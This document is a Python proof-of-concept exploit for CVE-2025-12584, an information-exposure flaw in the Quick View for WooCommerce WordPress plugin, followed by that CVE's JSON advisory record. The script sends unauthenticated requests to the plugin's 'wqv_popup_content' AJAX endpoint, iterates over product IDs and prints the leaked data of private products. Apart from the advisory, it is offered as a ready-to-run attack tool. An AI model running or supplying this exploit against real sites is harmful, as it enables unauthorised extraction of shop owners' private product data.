CVE-2025-12584

import requests import json # CVE-2025-12584 PoC - Information Disclosure in Quick View for WooCommerce # Target: WordPress site with Quick View for WooCommerce plugin <= 2.2.17 def exploit_cve_2025_12584(target_url, product_id): """ Exploit for CVE-2025-12584: Information Exposure via wqv_popup_content AJAX endpoint Args: target_url: Base URL of the WordPress site product_id: ID of the product to extract information from Returns: Product information if vulnerable, None otherwise """ # AJAX endpoint for quick view endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct the exploit request data = { 'action': 'wqv_popup_content', 'product_id': product_id } try: # Send unauthenticated request response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: # Check if product info is returned (vulnerability present) if 'price' in response.text or 'product' in response.text.lower(): return { 'status': 'VULNERABLE', 'product_id': product_id, 'response': response.text[:500] # First 500 chars } except Exception as e: return {'status': 'ERROR', 'message': str(e)} return {'status': 'NOT_VULNERABLE'} # Example usage if __name__ == '__main__': target = 'https://example-wordpress-site.com' # Test with various product IDs for pid in range(1, 10): result = exploit_cve_2025_12584(target, pid) if result.get('status') == 'VULNERABLE': print(f"[!] Product ID {pid} is accessible (VULNERABLE)") print(f"[!] Response preview: {result['response']}")

{"cve": {"id": "CVE-2025-12584", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:50.760", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quick View for WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.17 via the 'wqv_popup_content' AJAX endpoint due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from private products that they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402213%40woo-quickview&new=3402213%40woo-quickview&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/809472d5-1698-42da-b414-1dda40983a6e?source=cve", "source": "[email protected]"}]}}